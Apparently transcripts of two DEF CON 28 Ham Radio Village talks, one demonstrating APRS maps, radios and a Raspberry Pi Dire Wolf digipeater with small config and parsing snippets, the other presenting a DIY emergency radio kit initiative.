Okay, it's time for the demo. KG7OOW here with the Ham Radio Village. Let's get going on APRS and a quick walk around usage of every aspect. So let's get going. So APRS, the Automatic Packet Reporting System, is based on the AX.25 protocol from the 1980s. Pretty old. Another slang term for this protocol you may have heard is packet. APRS is basically another use of this. We're going to dive into more of the APRS route of this and some of the basic usage. So we'll go from the APRS website, how to see APRS. You won't need a license to do this. We are going to go to the end user, someone transmitting APRS from a handheld or mobile. And we'll also take a look at a digipeater, the final part of the APRS network that gets your message to other digipeaters or to an iGate out on the internet to be posted online. So let's first take a look at where I go. This is where you are going to see APRS traffic live for your area. There's two main websites. Let's dive into the first one. So this is aprs.fi. For those of you who haven't been here, it's a great resource to see live APRS traffic. We'll zoom out here. Let's go to the Las Vegas area, DEF CON central here, and see what's going on. So when you come to the site, it'll first probably throw you in somewhere in Finland. You'll have to navigate to where you want to go. The right-hand side will let you select how much traffic you want to see, whether you want to see traffic for the last hour, or the last traffic for the last day there. So plenty of information to see. We're mainly going to focus on the map here though. So here's the Vegas metro area, with all these icons about. We got what looks like an RV icon down here in the middle, driving around; it's an RV broadcasting APRS packets. We have weather stations. We have other objects on the map such as D-STAR repeaters and things like that, like N7ARR over here. Time is not working great on the video. We'll get some more details later there. And then here we are outside of Vegas, my favorite mountain, Mount Potosi. This is home to the Vegas digipeater and iGate. So it's definitely really cool to see all this on a map. And again, you don't have to be licensed to view this map. It's definitely a great resource. So this is what I go to when I am looking for who's coming through my area. What are they doing? Are they listening on a frequency that I might want to talk to them on? Mainly for vehicles here. But if we pan out into the desert, a lot of the times you'll see planes. You'll also see weather balloons and other things like that going across the map. So definitely keep an eye out for those. Let's, for a chance, see if there's any weather balloons or anything going across right now. I do not see anything up. They typically do launch every couple of weekends though out here in the West Desert. So definitely something to keep an eye out on. Okay, let's look into detail on some traffic. What are these users, what are these objects sending to the APRS network? So here's a car out in the West Desert going just past, let's see, just past the test site over there. We have K6BFA and he is cruising along the highway. We can see the timestamp of the data. We can see his heading, his speed, his altitude, any GPS metadata that that radio is capable of putting out. He has a little message, Mic-E, en route. And he is repeated by the Vegas Mount Potosi digipeater. If we zoom out here, we can kind of visualize how his packets are getting to the internet map here. Oh, come on. There's no one in here. So if you hover over an object. 
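As an aside, everything these maps display comes from the APRS-IS internet backbone, and aprs.fi also exposes a small JSON API if you would rather query a station from a script than hover over icons. The endpoint and parameters below reflect that API as commonly documented; it requires a free account and API key, so treat the details as something to verify against the current aprs.fi documentation. The callsign and key here are placeholders.

```python
# Sketch: ask aprs.fi for a station's last reported position (API key required).
import json
import urllib.request

def last_position(callsign, api_key):
    url = ("https://api.aprs.fi/api/get"
           f"?name={callsign}&what=loc&apikey={api_key}&format=json")
    with urllib.request.urlopen(url) as resp:
        data = json.load(resp)
    if data.get("result") != "ok" or not data.get("entries"):
        return None
    entry = data["entries"][0]                      # most recent position report
    return float(entry["lat"]), float(entry["lng"]), entry.get("time")

# print(last_position("K6BFA", "YOUR-APIKEY"))      # placeholder callsign and key
```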
Oh, come on. It is not wanting to work for me here. There we go. Let's get out here. Okay. See, so I'm hovering over his icon there. You can see it's going through the Vegas digipeater up on Mount Potosi, down in the bottom middle there. And it looks like it's going to another iGate, maybe the iGate there. Potosi's down. So these iGates that it's going to transmit to can be hundreds of miles away. Looks like that's down in the San Bernardino Valley. So that's a pretty crazy run for some APRS traffic. When you get to things like weather balloons, you'll have hundreds of stations picking those up directly. But the first station that picks it up is the one that gets to report it to the system. So another really cool map to hit up when you're looking for some APRS action is APRS Direct. It's more of a high-end web 2.0 type interface. It's got live updates. The icons will update live. You'll be able to see pings on the map when things happen as they're happening. So sometimes it's a little easier to see things here. This is kind of a newcomer to APRS maps, which is great. Let me throw a link there in chat for you guys while I'm going through. So this map, very similar to the last map, it's just a little more interactive. We got the same amount of data. You can see the hops that these packets are going through. You can click on an object. There's our same guy we're going to be picking on here, K6BFA. He is cruising along. There's his same path. He's being reported through Vegas at his timestamp. Same information: bearing, heading, things like that. So, this is just really cool, a very awesome way to see what's going on with the APRS network. Now how do you get traffic to the APRS network? So this traffic, including weather stations, handheld radios, mobile radios that are APRS capable, or anything else you can think of, they all require a modem-enabled device or just a fully integrated APRS device to get out there. One of the easiest ways to get into it is with an integrated radio. So let's look at my handy Kenwood TH-D72. It's a great, here we go. It's a great little radio, not really little. It's a little bulky. It needs to go on a little diet there, but it's an all-in-one solution to get your packets out to the APRS network. This particular handheld can be used with the built-in GPS with the antenna on the top there. It can also be connected with a cable to a weather station or other KISS-enabled device. So it's very cool, very fun to hear APRS going on. So it looks like someone's keyed up on APRS, but it sounds like voice data. Someone's got a hot mic. So the APRS frequency you're going to want to dial to on your all-in-one device is 144.390 in North America. I haven't gone through APRS in any other country, so I'm not 100% sure if they're throwing other frequencies around for other regions, but definitely 144.390 for North America. Now tuning into this frequency, you're going to hear the raw APRS packets. They are going to sound very much like an old classic modem. I don't know, it sounds like I'm getting some interference or someone's hot mic on 390 for me, so I'm not going to be able to decode anything. Yep, just static. So I'm thinking I got some interference. But with this handheld, I can beacon directly just by hitting beacon here, and it will manually beacon my location based on the GPS to the APRS network. I'm inside, so my GPS likely is not going to get my coordinates, and without proper coordinates I don't think it will show up, but just in case. Let's go look for KG7OOW. 
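For the curious, once those modem-like bursts are demodulated, an APRS packet is just a short text frame: source callsign, destination, digipeater path, and an information field. If you want to pick one apart in software rather than by ear, the third-party Python package aprslib can parse the monitor-format text. A small sketch, with a made-up example frame (the callsigns and position are placeholders):

```python
# Sketch: parse a TNC2/monitor-format APRS frame with aprslib (pip install aprslib).
import aprslib

raw = "K6BFA-9>APRS,WIDE1-1,WIDE2-1:!3609.50N/11510.25W>073/045 en route to DEF CON"
try:
    pkt = aprslib.parse(raw)
    print(pkt["from"], pkt.get("latitude"), pkt.get("longitude"),
          pkt.get("course"), pkt.get("speed"))
except (aprslib.ParseError, aprslib.UnknownFormat) as err:
    print("could not decode:", err)
```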
I am not showing up, so there's definitely some traffic around though. So with a handheld like this, we get to configure it. So out of the box, you need to configure your handheld with typically just your call sign. So I just go to the menu, hit up APRS, and it typically just needs your call sign. So you throw your call sign in there. Oh, there we go. You'll typically just throw your call sign in, maybe an SSID at the end. See that dash-9 at the tail in there. You can do that if you have multiple radios, or if you want to have a specific ID for that radio. And then you'll basically just need to tell it how to beacon. So on this handheld, we got, there we go. Where is it going? You can set your position manually and you have beacon. So this is how it's going to beacon your information. Typically on a handheld like this, you can set it to beacon on an interval, or you can have it beacon using what's called smart beaconing. And that will automatically beacon you based on your speed and your heading. So if you take a turn, or you change speeds, it's going to broadcast your APRS data accordingly. So it's really cool. These little handhelds are great, but definitely on the pricey end. So this Kenwood TH-D72, had to look that up there, is, I think I got this around 500 bucks. So it's definitely pricey. It's definitely capable, but there's other options out there. So let me slide this over and give kind of a cheaper option. So one other cool option is a standalone unit. I got this handy AVRT5 from AliExpress. These little things are all-inclusive. It's only one watt of power, but you'd be surprised how far you can get out with APRS on one watt of power. This handheld, this Kenwood, I've gone probably 150 miles, pure line of sight. So this was definitely to a mountaintop digipeater. I was out in the Nevada desert and was able to get to a digipeater in central Utah. So that was really cool. But this little one-watt, kind of hard to configure Chinese radio is actually pretty handy. I got hams here that will either just leave it alone, or throw a linear amp on it and get a little bit more distance out of it. But definitely something you can throw into your backpack, hiking, on your bike, in your pocket. So it's a very cool, very nice little slim device here. Another option when you're picking end-user APRS equipment is definitely an app called APRSdroid for Android. So APRSdroid, I haven't gotten to work on the latest version of Android, but with most ham software, you're going to expect that. You can get a little, this is called a Mobilinkd TNC. And it's just a little 3D-printed case with basically an Arduino Nano inside. And it connects via a little three and a half millimeter jack there to an adapter cable to your radio of choice. So it can be paired with a Baofeng. It can be paired with another radio, anything you want. And it connects via Bluetooth to your phone. So your phone will be running the APRSdroid app, and very much like the Kenwood handheld, you get to put in your call sign. You can put in the icons that you want and any messages that you want to put in as your beacon. Another really cool feature about APRS is not just GPS location, but messaging. So on my little Kenwood handheld here, I can send messages by using the keypad. Pretty old school, kind of like how you used to have to text back in the day, with the touchpad there. But the advantage of this cool little TNC with your APRSdroid-enabled phone: you can just use your Android phone, type the message, and get it sent. 
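Under the hood, one of those text messages is just another information field: a colon, the addressee padded to nine characters, another colon, up to 67 characters of text, and optionally a message number after a '{' so the receiving station can acknowledge it. A small sketch of building that field (the callsigns are placeholders):

```python
# Sketch: build the information field for an APRS text message.
# Format is ":ADDRESSEE:text{msgno" with the addressee space-padded to 9 characters.

def aprs_message(addressee, text, msg_no=None):
    if len(addressee) > 9:
        raise ValueError("addressee too long for APRS messaging")
    field = f":{addressee.upper():<9}:{text[:67]}"   # APRS limits message text to 67 chars
    if msg_no is not None:
        field += "{" + str(msg_no)                   # numbered messages expect an ack back
    return field

# Sent inside a normal frame, e.g. "KG7OOW-7>APRS::K0BAK    :see you at the pool{42"
print(aprs_message("K0BAK", "see you at the pool", 42))
```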
So it's much easier to use this paired with a phone and a radio than to just use the radio, if you're going to go the messaging route. So definitely something really cool. There's just, I always look on AliExpress or Amazon for new APRS devices, and every once in a while they'll come out with something really cool. So that gets us around the end-user devices, from handhelds, to other dedicated units from China that may or may not have reporting capabilities for the government there, to Mobilinkd TNCs with your Android phone. But there's another piece to this puzzle, and that's the stations that actually get that data, the packets that these devices put out, to other digipeaters and eventually to the internet. And that's where a digipeater comes in. So this is a basic digipeater setup. I got these all over the state here in Utah, and we have definitely increased the APRS coverage in my region, and I'm hoping to expand into other parts of Utah. So this whole setup consists of a two meter radio. This particular radio is just one I got off of surplus. It's an EF Johnson RS5300 here, and all you need is a two meter radio that has connections on it for push-to-talk and for the audio mic and speaker. These radios you see out there will have this either through the front port jack here or with a dongle or connection in the back. This one just happens to be done with a DB15 connector on the back to DB9, and this just plugs in and gives me the breakout for audio and push-to-talk, and that's all we need on the radio side. So a two meter radio. It can also be a handheld. I've seen people use Baofengs for this. So definitely something that can be done a little cheaper. But this is a nicer surplus radio. I got it for about 35, 40 bucks. So not too bad, not too shabby. So this radio needs to hook up to a device that can decode these APRS packets. To do this decode, I interface my Raspberry Pi with an Easy Digi. These are available on eBay and it comes in a little kit. You have to solder it together. Just a little more part of the adventure. All you really have to do is solder two leads for the audio and the connections to your radio for push-to-talk, things like that. So in this particular setup, I am using the GPIO for push-to-talk. You can also just use VOX if you're using, like, a handheld radio or a Baofeng. This particular two meter mobile radio is not capable of VOX, so I definitely have to manually trigger push-to-talk, and that's where GPIO on the Raspberry Pi comes in. So the radio goes to your Easy Digi. The Easy Digi is basically just isolation. You actually don't need the Easy Digi; you can wire things directly. It's just safer. You're not going to ruin your Pi with its low GPIO voltage, and you're not going to screw up your radio, and you'll also get cleaner audio. So definitely go with the Easy Digi. The Raspberry Pi, it's fitted, since it only has a speaker output. I wish they made this a four-pole connector with a mic input, but hey, you can always go to another Pi variant like the Banana Cream Pi or something for that. I just fit my $35 Raspberry Pi with a $4 or $5 USB audio card. So you can grab these on Amazon. I'll put a link in a little write-up when we post this video. But you just take your microphone, plug it in, and your speaker for your radio, plug it in there, get it in the Pi, and you're good to go on the hardware side, I guess other than the GPIO. So GPIO is another step in the setup. 
The GPIO portion, as well as the software portion, is covered in the documentation of the software I use, and we'll get into that right now. Let's go to the good old browser view here. So my choice of APRS software for my Raspberry Pi, or any other system, is called Dire Wolf. So we'll hit up Dire Wolf. I'm just going to use Google here. They have a great set of documentation on GitHub. You can go through any doc on here, but the main thing you need to do is go for the documentation on your system. So they have documentation for Linux, they have documentation for Windows, and they have specific documentation for the Raspberry Pi. So let me look here. So yeah, I'm just going to scroll down here just to make sure I'm speaking the truth here. But there we go: Raspberry Pi for ham radio. So Dire Wolf is going to be built on top of your Raspberry Pi, so you need to install a distro. I just use Raspbian for my Raspberry Pi. Get that installed on your Raspberry Pi and then use the instructions from GitHub here, the documentation repo, to build it for your system. Finally, it is literally just downloading the source and then compiling it. Once you've compiled it, you can start right out and get it running. So let's go to the console and see what Dire Wolf gives us on the Raspberry Pi. What kind of information, what does it look like when you're actually using Dire Wolf on your Raspberry Pi? I'll go and I'll probably post maybe some quick and dirty instructions for actually building a Dire Wolf kit on the website, hamvillage.org. But for now, let's cut to the end results. I think I'm pretty low on time here, and we'll go to the console here. So this is what a typical PuTTY session... well, not PuTTY, this is what a typical terminal of Dire Wolf will read out once you're up and running. You will see traffic coming across from mobiles, handheld units, and in my area definitely a lot of weather stations. So there's a plethora of information here and we can pick... Let's see, let's pick this latest one that came in. So this was an iGate transmit, looks like... Okay, that was just for that node. So let's go to this one, AJ6KW. So AJ6KW, with a destination of APTT4, came in with this path and looks like some GPS coordinates. So he came in with some GPS coordinates, a position with time. He is using a TinyTrak. So that's one of those cool little all-in-one devices, and it's spitting out his coordinates, course, and any other information. It's really cool just to see how much traffic you're going to get on these systems in the console. Let's see, here's another one coming in. Looks like a Jeep on a mobile unit coming in here with some coordinates, course, altitude, and he's monitoring on 146.520. So it looks like Keith, and I can hit him up on that frequency, give him a chat, and that's just really cool. The terminal here isn't necessarily the place you're going to want to stalk people on APRS; definitely use the web interface to do your stalking. But it's just really cool to see what your radio is hearing directly, because again, for the stuff posted on APRS.fi and APRS Direct, whatever station heard it first is the one that gets to post it there. So you may have heard it, but you may have not been the one that reported it to the servers there. So it's definitely something, definitely cool to see just the raw data. And see, here we go, here's just an iGate transmit from Frisco Peak, just throwing a beacon out with its position and location and that. This is AL7BX's rig; AL7BX is a good friend of mine. 
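For reference, once Dire Wolf is compiled, essentially all of the digipeater and iGate behaviour from this demo lives in one direwolf.conf file. The sketch below is only an illustration of the relevant directives for a setup like the one described (USB sound card, GPIO push-to-talk); the callsign, GPIO pin, coordinates and passcode are placeholders, and the Dire Wolf User Guide remains the authority on exact syntax.

```
# direwolf.conf sketch: placeholder values, check the Dire Wolf User Guide
ADEVICE plughw:1,0          # the cheap USB sound card, not the Pi's built-in audio
CHANNEL 0
MYCALL N0CALL-10            # your digipeater's callsign and SSID
MODEM 1200                  # standard 1200 baud AFSK for 144.390 MHz APRS
PTT GPIO 25                 # key the transmitter through the Easy Digi from this pin

# Act as a WIDEn-N digipeater
DIGIPEAT 0 0 ^WIDE[3-7]-[1-7]$|^TEST$ ^WIDE[12]-[12]$ TRACE

# Forward heard packets to the APRS-IS servers (iGate)
IGSERVER noam.aprs2.net
IGLOGIN N0CALL-10 123456    # passcode generated for your own callsign

# Beacon the station itself
PBEACON delay=1 every=30 overlay=S symbol="digi" lat=36^06.00N long=115^10.00W comment="Example digi"
```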
AL7BX has helped me a lot with this APRS stuff. We definitely are working together to build out more APRS rigs in our area. So I think we're pretty much up on time for the demo. The wonderful radiogram talk was amazing and pushed us over a tad but no worries. Let's go answer some questions in chat if there are any. I know this was kind of a drawn-out presentation and live demo, but let's see if there are any questions either in Discord or in Twitch here. Give it a quick glance and we'll get going here. Okay well, definitely an earful. There are definitely more resources for APRS. If you want to get into APRS, you want to carry it along with you, or you want to expand the APRS network yourself, go ahead and hit me up in the Ham Radio Village Discord on the DEFCON server or our own Ham Radio Village server. I'll throw links in chat. Just go ahead and I will even be able to help you remotely. I've helped people with remote desktop to help set up their rigs. Any help I can give, I'm just more than happy to expand and contribute to the APRS community. So thank you everybody and we'll see you back for closing comments here in just a little bit. Alright, bye.
|
In this live demo, we'll go over what APRS is, what you can do with it, and a quick primer on how to get started.
|
10.5446/51648 (DOI)
|
You You You You Hello everyone, thank you for joining me for my presentation about the Ostwerk initiative here at the DEF CON 28 safe mode I would like to thank you all for giving me an opportunity to show you the presentation I put together And if you have a passing interest in amateur radio, I hope you find it interesting Quick heads up most talks or presentations like this are usually an expert lecturing about a topic They are very familiar with to an interested audience This is kind of the opposite where today I'm an amateur radio enthusiast presenting more of a concept to people who know much more than I do Concept that's very fluid and open to change right now depending on community input All right, let's begin Please keep in mind that this is my first DEF CON so this is a learning experience especially for me If you have any questions during this presentation Feel free to ask them in the appropriate moderated channel in the DEF CON discord server and at the end I hope to have Not necessarily a Q&A but more of like a moderated round table style discussion about your thoughts about this project It's strengths and what it needs and I've never been part of something like that before so I'm interested to see how this goes I'm willing to take a gamble that many of you know what a lightsaber is for those that don't it's basically a laser sword from a popular movie franchise In the stories with rare exceptions if you wanted a lightsaber of your own you had to build it To your own exacting specifications So where the switches are the way it fits in your hand the weight and the balance it's all perfectly attuned to the builder Well, what if ham radio could have their own version of the lightsaber? Right off the bat what I hope to accomplish with this presentation is a way to simplify and encourage the planning and construction of amateur radio kits If that doesn't interest you then you are free to duck out now It won't hurt my feelings. 
I understand your time is valuable and we'll both be happier if you were spending it your time by doing Something that interests you so to those of you who already have an enthusiasm for amateur radio And you're probably not going to learn anything brand new But I want to keep some of the principles here in mind when you're elmering a new ham that wants a radio of their own All right enter the open-source tactical wireless emergency radio kit or twerk or twerk station a twerk is a custom kit built by a radio enthusiast to operate in times of an off-grid situation So you can build one for relaying voice messages into or out of a disaster zone Or you can set up a data network node or keep track of contacts during a contest Or you can administer a twerk station parliament each kit is custom built by the owner to be dependable Not just for casual use, but especially for emergency situations as well And it's my hope that this presentation motivates you to create a twerk station of your own or assist someone in the creation of their own twerk station I'd now like to walk you through a sample twerk station It is a voice twerk station that I built that has data capabilities on board It can't broadcast or receive data, but it could you could use the computer on board for a contest logging or local networking the This twerk station is sealed up in a durable plastic case and it's extremely water resistant and dust proof with the lids closed There's no external access ports, so you have to open the kit if you want to charge it or hook up the antenna Here it is open but undeployed The keyboard the microphone and the mouse kind of float around in there loose The switches and thumb screws in there do a good job of keeping them from sliding around But I still would like to add some kind of cushioning in there to avoid rattle damage So flipping the that blank panel that was in the lower part over you'll see that there is a remote faceplate for an ID 4100 Also under that panel is the fuse box and the cables that feed into the raspberry pi And the lower left is the power controller which switches automatically between external power and the lead acid batteries that are on board and then on the right are the pass throughs that The route pass through the microphone There's pass throughs that go for the USB and the audio cable into the raspberry pi and there is USB ports that are not pass throughs. They're just charging ports The Top left of the panel has the power controls and the power display the switches engage the battery the red one does and Then the black switch below selects between the main battery and the on board backup There's a power display that shows the voltage and amperage used by the kit So it's easy to estimate the remaining power at current use. And here's the fully deployed torque station Just to let you guys know the monitor on the right is being powered off of AC power that goes to USB C cable So it's not being powered off the kit right now That would be pretty trivial to do. 
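Because the panel meter shows volts and amps, a back-of-the-envelope runtime estimate is just capacity divided by draw. The numbers in this little Python sketch are hypothetical, and the usable fraction is only a rough allowance for not running a battery completely flat.

    def hours_remaining(battery_ah, load_amps, usable_fraction=0.8):
        """Rough runtime estimate from the panel meter's current reading."""
        return battery_ah * usable_fraction / load_amps

    # e.g. a 15 Ah pack with the radio and Pi idling at about 1.2 A
    print(round(hours_remaining(15.0, 1.2), 1), 'hours')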
I just need to find a reliable USB hub that That that is powered enough to keep all of all the hardware on board powered up So my prototype kit is done for the most part, but it's actually not the kit has a few issues for one thing It's really heavy I want the long battery life and sealed lead acid batteries are cheap But the kit can't be carried for more than a minute or two The radio I have is a decent radio, but I want to switch over to HF bands The kit has a big clunky antenna switch that I'm not going to use very often And I discovered some new power pole mounts. I want to incorporate into the design So now I know what to improve. I can budget to get new batteries and a compatible charger ditch the auxiliary battery in favor of bringing a solar panel and Upgrade the radio to an HF radio. I'll also need to design up a new mounting panel for all of these new parts So that was version one of the kit and some of the challenges that I'll need to overcome Now after I go over the three pillars of the Ostwork initiative I'll demonstrate the operation of the upgraded torque station at the end of the video Which may give some of you ideas for the kit you may want to build The Ostwork initiative has three pillars that I think would make it successful One is enthusiasm for the construction of torque stations second pillar is the online platform torquebench.org where a torque station constructors or torque smiths can compare notes and The third pillar is the torque Smith code of conduct and let's get into these in detail First off is the kit open source Are there schematics or diagrams or a build of materials available online somewhere so that I can build my own copy of the kit and put My own spin on it Second the the kits should be tactical. It should be constructed to work with other torque stations in the event of an emergency The kit should also have some degree of durability Just think about how many tiers are going to roll down your cheeks if the kit fell down a off a table or a tailgate The kit should be wireless Six hours of operation is a good ballpark and more is always better, but more means either more weight or more cost So balance your options carefully The kit can be used for emergencies or everyday use if you plan on using your kit every day be aware of heat buildup and have proper Ventilation or better yet just invest in a dedicated base station. Maybe The guidelines actually pretty loose one and it was added mostly because the acronym needed a vowel Next the kit should have a radio in it Usually a mobile rig a 12-volt kind of mobile rig, but it's encouraged to throw a cheap HT or other kind of walkie-talkie style radio into a power or Utility kit just to have one on hand just in case The final guideline is that everything is conveniently located into one single package The kit has everything it needs built in by the owner and delicate components should fold into the kit for protection during transport All right now let's get into the major types of torque stations you might see These are by no means all-encompassing, but should act as a starting point when designing a torque station First off is the voice torque a very common easy to make kit. 
It can be made from like a used radio and a sealed lead acid battery In some kind of durable case It's accessible from the outside and from the inside It's accessible for a get-on-the-air and tech licenses Second up is a data kit and those are similar to the voice kits But they have some kind of computer on board to take advantage of digital radio modes The computer can be a Raspberry Pi or a laptop or a surface tablet Whatever just some way to get to decode digital information and to get it out onto the air SATCOM kits are designed for satellite interfacing and they're usually paired with the special antenna And there's CWHF or weak signal kits And you want to be considerate of the weak signal kits because they're pretty sensitive to the EMF noise Those are some of the main types of kits that you're probably going to interact with or build And let's take a look at some of the support kit ideas some of the advanced level kits The auxiliary power kits supply power to your torque stations You also need to think of a way to replenish power if there's no grid solar is a pretty popular option Next up antenna kits provide masks feed line and the antenna is necessary for broadcast and reception Some kits are as simple as a spool of wire and others have complex folding mechanisms Troubleshooter kits are stocked with all the tools adapters duct tape zip ties Everything you need to keep everyone on the air and happy and remember to always thank your troubleshooter And if a torque station parliament gets too cumbersome someone can step up as net ops to take care of the administrative side of things during a crisis They can act as one point of contact and direct the appointment of a power comptroller to oversee the power consumption In a multi-day grid down situation So lots of coordination options available if you'd like Finally we have a few rare torque stations These are a couple torque stations that you won't see in the wild that often First off is the llama big and heavy the llama is for the person that overpacks for every trip It tries to do too much and doesn't tend to do anything very well The rarest type of kit is the Alright, so those were the torque stations. Let's move on to pillar two or the online platform This is kind of the weakest pillar for me. 
I am not a web expert at all I have a lot of ideas based on stuff that I've seen online, but I don't really have a way to implement them So this is where I am going to need the most help, but here are some of the ideas that I've got The website should have a link to their own forums, hopefully A place people can submit photos and designs to be featured in the gallery A place where people new to the hobby can stop in and have any questions answered The website will also have a feature similar to PC part picker Where you can pick out and design your own torque station And have it tell you approximately how much power you'll need The website will also hopefully feature a regional map That assists torquesmiths to find each other And maybe display power levels and capabilities of a particular registered region So if you want to compete against nearby towns as to who's got the most power Standing by in the event of an emergency, that would be kind of fun One additional item would be a portal where student radio groups could design an ideal torque station And find a place to get help with fundraiser or grant writing or sponsorships A few more website ideas Again, I have no idea how to implement these So this is all wishful thinking right now The website might have a torqueathlon information and I'll discuss what that is later The site would have not just a kit builder, but a kit panel builder Where people could design custom panel for their kits Drag and drop precise holes or precise cutouts for parts that they know they want in their kit In the same vein, the site could have a makerspace locator where torques could be used Or a local makerspace locator where torquesmiths could find a local makerspace to help with tools Or 3D printing or laser cutting, anything for constructing torque stations You know, maybe we could make some arrangements for partnerships or sponsorships or discounts or something Finally, the site could have an online marketplace Where you could buy patches, stickers, small custom trinkets that could make your kit stand out You won't be able to buy torque stations because that defeats the purpose of the whole initiative If you want a torque station, you got to build one yourself The third and final pillar is one that I'm sure people will gloss over The Torquesmith code of conduct Just a handful of principles that I hope people will live by If they want to build their own torque station A good Torquesmith is courteous If you build your torque station properly, it should attract a little attention from people who may have a passing interest in our hobby So be ready to be peppered with a few questions every once in a while when you're using your torque station A good Torquesmith is competent A torque station is built to the exacting specifications of its creator and any shortcomings of the kit lie with the builder So know how to operate your kit and know about how much power you have left at all times in an off-grid situation Also know how to budget your remaining power responsibly A good Torquesmith values their community, both online and offline Ideally you would know a couple nearby torque station owners and agree on a schedule to make contact should the worst happen in a grid down situation Also see what you can do in a disaster to supply comfort and relief to those negatively affected A Torquesmith values their own personal honor They would never cheat a contest and would never reveal the contents of the mystery box A Torquesmith shows their work There are people out there 
who are interested in seeing what you've made I know I am What makes your kit special? How does it fit into your lifestyle? Finally a Torquesmith knows that there is always room for improvement Whether it's cheaper components or farther range or better battery life, whatever A Torquesmith knows that their kit is never finished and it's just a jumping off point for better things So those were the three main pillars of the Ostwerk initiative And here are some bonus slides at the end I'm going to go over something I came up with called the Torcathlon And then we'll take a tour of a Torque station that I built, a Llama class So what if there was a competition where teams could show off their ingenuity and hustle Basically a small course is set up with obstacles to climb over or struggle through That would resemble maybe a post disaster situation And teams of Torque station owners would try to race against the clock to carry their stations Any way they want through the course And then when they get the finish line They use them to relay some traffic through a remote judging station at the end Costumes and theme teams are encouraged And a reminder should go out beforehand saying that public intoxication of all types is frowned upon All right, so here is my latest kit There's a little red patch on the top where I adhere a suction cup antenna There's about four latches on the kit that keeps the kit airtight Watertight, dust-proof I still don't have a decent solution to this But I'm going to go ahead and try to get a little bit of a look at the kit And then I'm going to go ahead and try to get a little bit of a look at the kit I still don't have a decent solution to keep everything from sliding around I've got the keyboard here And I've got the microphone to uncoil Check for product shifting during transport Everything looks good I'll get ready to mount the software radio antenna Just onto the lid onto that red square of vinyl that I put on there Because the suction cup doesn't adhere to the course plastic of the kit So I need something smooth to stick the suction cup onto A little GPS antenna A little USB GPS antenna sticks to a metal clip For locking the kit shut I'll get that screwed on Alright, let's get ready to hook up the external power I've got my shanktronics power brigands supplying all the power I need for the kit Turn it on, and I can see the display on the kit turns on Alright, let's get the Raspberry Pi fired up I've got the power switch there next to the pass-through for the USB and the audio for the Raspberry Pi I've got the dual monitors hooked up, and oh well I've got this The USB switch was powered on The USB hub there was powered on So now that the computer is booted up, I'm just going to control it with the Logitech keyboard here I'll fire up my FL rig And I'm going to boot up my RadioData software package WSJTX And unfortunately the kit is not cooperating with me The radio is receiving, but it's not putting audio from the radio into the Raspberry Pi And that's a problem I really need to troubleshoot here Moving along, I can fire up GQRX Which I have pre-programmed to decode the local classical radio station But the cool thing about the SDR is that I can program any channel I want to into here, any channel that the SDR is able to decode Alright, now for the moment you've all been waiting for a closer look into the SnacksS panel So we remove the panel And inside we have an array of Snacks We have a post snack treat We have some crunchy snacks We have some sweet snacks And we 
also have some more salty snacks And then all the snacks get tucked right back away into the SnacksS compartment And we replace the SnacksS panel I hope to incorporate some kind of magnets or maybe 3D print a latching solution for sometime in the near future Alright, let's power down the kit I'll log off the Raspberry Pi And then flip off the power switch here That terminates power to the monitors and the Pi Turn off the radio And then disconnect the battery We've been running off battery power this whole time Battery power disconnected And as a safety measure I'm going to turn it from battery power to external power So in case the switch gets bumped For some reason it doesn't drain the battery And for those of you who are interested Here is a blocky wiring diagram for how the kit works I've got the two ports, a solar port for power input And a 12 volt port for external power input And then it goes into the power work solar charge controller And then that charges the battery And then I have the big red battery cutoff switch Between the battery and the external power And then that feeds into the fuse block And then the fuse block shoots out the 12 volt leads to all of the hardware in there that runs off of 12 volts Alright, you've made it to the end of the pre-recorded portion If you're still interested you're welcome to visit the website twerkbench.org To see what we have so far, and if you want to voice in the direction this project goes You can join the Discord community by visiting our Discord server online The link there is on our website at twerkbench.org And I'm going to do a live Q&A now and hopefully a demo Of my equipment cooperates to round out my presentation time So please stick around and we can hopefully have a moderated discussion where we can share ideas And where this initiative should go moving forward Cool, so we have SwissNinja here and I'm live on video feeding I think he's ready to give us a nice demo Before you start though I do have a starting question Is there any sort of mod or thing you've made that you've tried to make And just messed up so bad that you just said nope this is going in the trash, I have to start over No, but leading right up to this presentation The audio input that goes from my HF transceiver to the Raspberry Pi Won't detect the audio signal, like I know that the audio signal exists But it's not going into the Pi I wanted to show off a couple of data modes that I would be able to receive on the Raspberry Pi But that won't be done today's presentation I was curious if anyone had any quick questions or anything that I maybe I didn't cover in the video Or any suggestions Because it looks like the chat topics are a little empty right now Did anyone have anything to ask or add? So I'm curious if anyone has any experience with working with a volunteer software team or web development team Because a big part of the pillar of the initiative here is the website And the website we have right now is very basic And I'm learning web stuff as I go along But I wouldn't mind supercharging it with a couple team members So if anyone worked with a volunteer team in the past to get something like this done I'm not aware of any personally I mean I'm curious are you also releasing all these like plans and open source stuff to like get something like GitHub as well? 
Oh absolutely yes, yes so I hope that other people can join in And like I said copy plans like they can take a look at the Torque Station I built That's kind of what the stemmed from was I saw kits online I would say that oh those are so awesome but I could never have one of those And then one day I decided to put a kit together for my father at the behest of my mom She was curious how we could all get together in the event of an emergency And I said oh well ham radio and I wanted to get like an all in one solution that they could use after getting their ham radio licenses To get on the air with me in the event of a grid down situation And so I would see the kits online and I would say oh those are awesome And then I decided to just build one myself and it was surprisingly easy And I just want to let people know that I want to remove the barrier to entry to making kits for themselves Like a big one is the panel of the kit Like I can actually start moving stuff around here Like being able to laser cut I have a laser cutter in my garage and being able to laser cut a panel whenever I need a new one is a huge blessing But I want other people to be able to have that access to like to nearby maker spaces places where they would be able to download plans for a panel And then be able to have them cut out So that would probably be a portion of the website would be being able to coordinate people to be able to make their own things Or this panel that the radio is inset in is 3D printed I've got my own 3D printer I know a lot of people that's a barrier to entry they don't have their own I'd like to be able to connect people that want to have their own inset panel mount things like I've made Or that they've designed their own I want to connect them with online resources to be able to get them printed out Cool we do have a couple of questions here from the audience One is what if you need more room for snacks I'm assuming there's going to be some sort of like snack expander box or something like that Oh yeah there's always you can get extra kits to put extra snacks in You can always sacrifice extra battery power get a smaller radio right now This design of the 3D inset panel for my radio face is just kind of basically a prototype It's kind of there's a lot of wasted space around the edges you can see so it still needs refinement I hope to post the plan files online so that people can download and print them It's actually this this panel itself is on Thingiverse if you Google or if you use the search for Jigoo G90 It should pop up as one of the 3D printable items And then I also hope to have like sticker templates like I like the industrial style of stickers so that's my kit Some people might have something less colorful or more colorful more informative maybe more minimalist So I hope to have like vector files online available for stickers if you want to download them yourself Great it's great to hear some more questions coming in here what type of brand of case do you use in this kit This is a Harbor Freight Apache case I hope to put a once I've I've a lot of done some upgrades to the kit And I hope to have a completed bill of materials done once my presentation I've been prepping for the 